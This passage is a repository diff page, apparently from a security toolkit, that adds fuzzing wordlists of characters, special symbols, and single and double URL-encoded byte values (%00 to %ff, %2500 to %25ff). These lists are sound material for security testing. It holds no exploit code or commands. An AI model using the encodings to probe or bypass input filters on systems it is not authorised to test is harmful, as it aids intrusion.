||||
r
|
||||
s
|
||||
t
|
||||
u
|
||||
v
|
||||
w
|
||||
x
|
||||
y
|
||||
z
|
||||
A
|
||||
B
|
||||
C
|
||||
D
|
||||
E
|
||||
F
|
||||
G
|
||||
H
|
||||
I
|
||||
J
|
||||
K
|
||||
L
|
||||
M
|
||||
N
|
||||
O
|
||||
P
|
||||
Q
|
||||
R
|
||||
S
|
||||
T
|
||||
U
|
||||
V
|
||||
W
|
||||
X
|
||||
Y
|
||||
Z
|
95
Vulnerabilities_and_Exploits/fuzzing/alphanum_case_extra.txt
Executable file
95
Vulnerabilities_and_Exploits/fuzzing/alphanum_case_extra.txt
Executable file
|
@ -0,0 +1,95 @@
|
|||
!
|
||||
"
|
||||
#
|
||||
$
|
||||
%
|
||||
&
|
||||
'
|
||||
(
|
||||
)
|
||||
*
|
||||
+
|
||||
,
|
||||
-
|
||||
.
|
||||
/
|
||||
0
|
||||
1
|
||||
2
|
||||
3
|
||||
4
|
||||
5
|
||||
6
|
||||
7
|
||||
8
|
||||
9
|
||||
:
|
||||
;
|
||||
<
|
||||
=
|
||||
>
|
||||
?
|
||||
@
|
||||
A
|
||||
B
|
||||
C
|
||||
D
|
||||
E
|
||||
F
|
||||
G
|
||||
H
|
||||
I
|
||||
J
|
||||
K
|
||||
L
|
||||
M
|
||||
N
|
||||
O
|
||||
P
|
||||
Q
|
||||
R
|
||||
S
|
||||
T
|
||||
U
|
||||
V
|
||||
W
|
||||
X
|
||||
Y
|
||||
Z
|
||||
[
|
||||
\
|
||||
]
|
||||
^
|
||||
_
|
||||
`
|
||||
a
|
||||
b
|
||||
c
|
||||
d
|
||||
e
|
||||
f
|
||||
g
|
||||
h
|
||||
i
|
||||
j
|
||||
k
|
||||
l
|
||||
m
|
||||
n
|
||||
o
|
||||
p
|
||||
q
|
||||
r
|
||||
s
|
||||
t
|
||||
u
|
||||
v
|
||||
w
|
||||
x
|
||||
y
|
||||
z
|
||||
{
|
||||
|
|
||||
}
|
||||
~
|
||||
|
26
Vulnerabilities_and_Exploits/fuzzing/char.txt
Executable file
26
Vulnerabilities_and_Exploits/fuzzing/char.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
a
|
||||
b
|
||||
c
|
||||
d
|
||||
e
|
||||
f
|
||||
g
|
||||
h
|
||||
i
|
||||
j
|
||||
k
|
||||
l
|
||||
m
|
||||
n
|
||||
o
|
||||
p
|
||||
q
|
||||
r
|
||||
s
|
||||
t
|
||||
u
|
||||
v
|
||||
w
|
||||
x
|
||||
y
|
||||
z
|
256
Vulnerabilities_and_Exploits/fuzzing/doble_uri_hex.txt
Executable file
256
Vulnerabilities_and_Exploits/fuzzing/doble_uri_hex.txt
Executable file
|
@ -0,0 +1,256 @@
|
|||
%2500
|
||||
%2501
|
||||
%2502
|
||||
%2503
|
||||
%2504
|
||||
%2505
|
||||
%2506
|
||||
%2507
|
||||
%2508
|
||||
%2509
|
||||
%250a
|
||||
%250b
|
||||
%250c
|
||||
%250d
|
||||
%250e
|
||||
%250f
|
||||
%2510
|
||||
%2511
|
||||
%2512
|
||||
%2513
|
||||
%2514
|
||||
%2515
|
||||
%2516
|
||||
%2517
|
||||
%2518
|
||||
%2519
|
||||
%251a
|
||||
%251b
|
||||
%251c
|
||||
%251d
|
||||
%251e
|
||||
%251f
|
||||
%2520
|
||||
%2521
|
||||
%2522
|
||||
%2523
|
||||
%2524
|
||||
%2525
|
||||
%2526
|
||||
%2527
|
||||
%2528
|
||||
%2529
|
||||
%252a
|
||||
%252b
|
||||
%252c
|
||||
%252d
|
||||
%252e
|
||||
%252f
|
||||
%2530
|
||||
%2531
|
||||
%2532
|
||||
%2533
|
||||
%2534
|
||||
%2535
|
||||
%2536
|
||||
%2537
|
||||
%2538
|
||||
%2539
|
||||
%253a
|
||||
%253b
|
||||
%253c
|
||||
%253d
|
||||
%253e
|
||||
%253f
|
||||
%2540
|
||||
%2541
|
||||
%2542
|
||||
%2543
|
||||
%2544
|
||||
%2545
|
||||
%2546
|
||||
%2547
|
||||
%2548
|
||||
%2549
|
||||
%254a
|
||||
%254b
|
||||
%254c
|
||||
%254d
|
||||
%254e
|
||||
%254f
|
||||
%2550
|
||||
%2551
|
||||
%2552
|
||||
%2553
|
||||
%2554
|
||||
%2555
|
||||
%2556
|
||||
%2557
|
||||
%2558
|
||||
%2559
|
||||
%255a
|
||||
%255b
|
||||
%255c
|
||||
%255d
|
||||
%255e
|
||||
%255f
|
||||
%2560
|
||||
%2561
|
||||
%2562
|
||||
%2563
|
||||
%2564
|
||||
%2565
|
||||
%2566
|
||||
%2567
|
||||
%2568
|
||||
%2569
|
||||
%256a
|
||||
%256b
|
||||
%256c
|
||||
%256d
|
||||
%256e
|
||||
%256f
|
||||
%2570
|
||||
%2571
|
||||
%2572
|
||||
%2573
|
||||
%2574
|
||||
%2575
|
||||
%2576
|
||||
%2577
|
||||
%2578
|
||||
%2579
|
||||
%257a
|
||||
%257b
|
||||
%257c
|
||||
%257d
|
||||
%257e
|
||||
%257f
|
||||
%2580
|
||||
%2581
|
||||
%2582
|
||||
%2583
|
||||
%2584
|
||||
%2585
|
||||
%2586
|
||||
%2587
|
||||
%2588
|
||||
%2589
|
||||
%258a
|
||||
%258b
|
||||
%258c
|
||||
%258d
|
||||
%258e
|
||||
%258f
|
||||
%2590
|
||||
%2591
|
||||
%2592
|
||||
%2593
|
||||
%2594
|
||||
%2595
|
||||
%2596
|
||||
%2597
|
||||
%2598
|
||||
%2599
|
||||
%259a
|
||||
%259b
|
||||
%259c
|
||||
%259d
|
||||
%259e
|
||||
%259f
|
||||
%25a0
|
||||
%25a1
|
||||
%25a2
|
||||
%25a3
|
||||
%25a4
|
||||
%25a5
|
||||
%25a6
|
||||
%25a7
|
||||
%25a8
|
||||
%25a9
|
||||
%25aa
|
||||
%25ab
|
||||
%25ac
|
||||
%25ad
|
||||
%25ae
|
||||
%25af
|
||||
%25b0
|
||||
%25b1
|
||||
%25b2
|
||||
%25b3
|
||||
%25b4
|
||||
%25b5
|
||||
%25b6
|
||||
%25b7
|
||||
%25b8
|
||||
%25b9
|
||||
%25ba
|
||||
%25bb
|
||||
%25bc
|
||||
%25bd
|
||||
%25be
|
||||
%25bf
|
||||
%25c0
|
||||
%25c1
|
||||
%25c2
|
||||
%25c3
|
||||
%25c4
|
||||
%25c5
|
||||
%25c6
|
||||
%25c7
|
||||
%25c8
|
||||
%25c9
|
||||
%25ca
|
||||
%25cb
|
||||
%25cc
|
||||
%25cd
|
||||
%25ce
|
||||
%25cf
|
||||
%25d0
|
||||
%25d1
|
||||
%25d2
|
||||
%25d3
|
||||
%25d4
|
||||
%25d5
|
||||
%25d6
|
||||
%25d7
|
||||
%25d8
|
||||
%25d9
|
||||
%25da
|
||||
%25db
|
||||
%25dc
|
||||
%25dd
|
||||
%25de
|
||||
%25df
|
||||
%25e0
|
||||
%25e1
|
||||
%25e2
|
||||
%25e3
|
||||
%25e4
|
||||
%25e5
|
||||
%25e6
|
||||
%25e7
|
||||
%25e8
|
||||
%25e9
|
||||
%25ea
|
||||
%25eb
|
||||
%25ec
|
||||
%25ed
|
||||
%25ee
|
||||
%25ef
|
||||
%25f0
|
||||
%25f1
|
||||
%25f2
|
||||
%25f3
|
||||
%25f4
|
||||
%25f5
|
||||
%25f6
|
||||
%25f7
|
||||
%25f8
|
||||
%25f9
|
||||
%25fa
|
||||
%25fb
|
||||
%25fc
|
||||
%25fd
|
||||
%25fe
|
||||
%25ff
|
31
Vulnerabilities_and_Exploits/fuzzing/special_chars.txt
Executable file
31
Vulnerabilities_and_Exploits/fuzzing/special_chars.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
~
|
||||
!
|
||||
@
|
||||
#
|
||||
$
|
||||
%
|
||||
^
|
||||
&
|
||||
*
|
||||
(
|
||||
)
|
||||
_
|
||||
_
|
||||
+
|
||||
=
|
||||
{
|
||||
}
|
||||
[
|
||||
|
|
||||
\
|
||||
`
|
||||
,
|
||||
.
|
||||
/
|
||||
?
|
||||
;
|
||||
:
|
||||
'
|
||||
"
|
||||
<
|
||||
>
|
17576
Vulnerabilities_and_Exploits/fuzzing/test_ext.txt
Executable file
17576
Vulnerabilities_and_Exploits/fuzzing/test_ext.txt
Executable file
File diff suppressed because it is too large
Load diff
65536
Vulnerabilities_and_Exploits/fuzzing/unicode.txt
Executable file
65536
Vulnerabilities_and_Exploits/fuzzing/unicode.txt
Executable file
File diff suppressed because it is too large
Load diff
256
Vulnerabilities_and_Exploits/fuzzing/uri_hex.txt
Executable file
256
Vulnerabilities_and_Exploits/fuzzing/uri_hex.txt
Executable file
|
@ -0,0 +1,256 @@
|
|||
%00
|
||||
%01
|
||||
%02
|
||||
%03
|
||||
%04
|
||||
%05
|
||||
%06
|
||||
%07
|
||||
%08
|
||||
%09
|
||||
%0a
|
||||
%0b
|
||||
%0c
|
||||
%0d
|
||||
%0e
|
||||
%0f
|
||||
%10
|
||||
%11
|
||||
%12
|
||||
%13
|
||||
%14
|
||||
%15
|
||||
%16
|
||||
%17
|
||||
%18
|
||||
%19
|
||||
%1a
|
||||
%1b
|
||||
%1c
|
||||
%1d
|
||||
%1e
|
||||
%1f
|
||||
%20
|
||||
%21
|
||||
%22
|
||||
%23
|
||||
%24
|
||||
%25
|
||||
%26
|
||||
%27
|
||||
%28
|
||||
%29
|
||||
%2a
|
||||
%2b
|
||||
%2c
|
||||
%2d
|
||||
%2e
|
||||
%2f
|
||||
%30
|
||||
%31
|
||||
%32
|
||||
%33
|
||||
%34
|
||||
%35
|
||||
%36
|
||||
%37
|
||||
%38
|
||||
%39
|
||||
%3a
|
||||
%3b
|
||||
%3c
|
||||
%3d
|
||||
%3e
|
||||
%3f
|
||||
%40
|
||||
%41
|
||||
%42
|
||||
%43
|
||||
%44
|
||||
%45
|
||||
%46
|
||||
%47
|
||||
%48
|
||||
%49
|
||||
%4a
|
||||
%4b
|
||||
%4c
|
||||
%4d
|
||||
%4e
|
||||
%4f
|
||||
%50
|
||||
%51
|
||||
%52
|
||||
%53
|
||||
%54
|
||||
%55
|
||||
%56
|
||||
%57
|
||||
%58
|
||||
%59
|
||||
%5a
|
||||
%5b
|
||||
%5c
|
||||
%5d
|
||||
%5e
|
||||
%5f
|
||||
%60
|
||||
%61
|
||||
%62
|
||||
%63
|
||||
%64
|
||||
%65
|
||||
%66
|
||||
%67
|
||||
%68
|
||||
%69
|
||||
%6a
|
||||
%6b
|
||||
%6c
|
||||
%6d
|
||||
%6e
|
||||
%6f
|
||||
%70
|
||||
%71
|
||||
%72
|
||||
%73
|
||||
%74
|
||||
%75
|
||||
%76
|
||||
%77
|
||||
%78
|
||||
%79
|
||||
%7a
|
||||
%7b
|
||||
%7c
|
||||
%7d
|
||||
%7e
|
||||
%7f
|
||||
%80
|
||||
%81
|
||||
%82
|
||||
%83
|
||||
%84
|
||||
%85
|
||||
%86
|
||||
%87
|
||||
%88
|
||||
%89
|
||||
%8a
|
||||
%8b
|
||||
%8c
|
||||
%8d
|
||||
%8e
|
||||
%8f
|
||||
%90
|
||||
%91
|
||||
%92
|
||||
%93
|
||||
%94
|
||||
%95
|
||||
%96
|
||||
%97
|
||||
%98
|
||||
%99
|
||||
%9a
|
||||
%9b
|
||||
%9c
|
||||
%9d
|
||||
%9e
|
||||
%9f
|
||||
%a0
|
||||
%a1
|
||||
%a2
|
||||
%a3
|
||||
%a4
|
||||
%a5
|
||||
%a6
|
||||
%a7
|
||||
%a8
|
||||
%a9
|
||||
%aa
|
||||
%ab
|
||||
%ac
|
||||
%ad
|
||||
%ae
|
||||
%af
|
||||
%b0
|
||||
%b1
|
||||
%b2
|
||||
%b3
|
||||
%b4
|
||||
%b5
|
||||
%b6
|
||||
%b7
|
||||
%b8
|
||||
%b9
|
||||
%ba
|
||||
%bb
|
||||
%bc
|
||||
%bd
|
||||
%be
|
||||
%bf
|
||||
%c0
|
||||
%c1
|
||||
%c2
|
||||
%c3
|
||||
%c4
|
||||
%c5
|
||||
%c6
|
||||
%c7
|
||||
%c8
|
||||
%c9
|
||||
%ca
|
||||
%cb
|
||||
%cc
|
||||
%cd
|
||||
%ce
|
||||
%cf
|
||||
%d0
|
||||
%d1
|
||||
%d2
|
||||
%d3
|
||||
%d4
|
||||
%d5
|
||||
%d6
|
||||
%d7
|
||||
%d8
|
||||
%d9
|
||||
%da
|
||||
%db
|
||||
%dc
|
||||
%dd
|
||||
%de
|
||||
%df
|
||||
%e0
|
||||
%e1
|
||||
%e2
|
||||
%e3
|
||||
%e4
|
||||
%e5
|
||||
%e6
|
||||
%e7
|
||||
%e8
|
||||
%e9
|
||||
%ea
|
||||
%eb
|
||||
%ec
|
||||
%ed
|
||||
%ee
|
||||
%ef
|
||||
%f0
|
||||
%f1
|
||||
%f2
|
||||
%f3
|
||||
%f4
|
||||
%f5
|
||||
%f6
|
||||
%f7
|
||||
%f8
|
||||
%f9
|
||||
%fa
|
||||
%fb
|
||||
%fc
|
||||
%fd
|
||||
%fe
|
||||
%ff
|
Loading…
Add table
Add a link
Reference in a new issue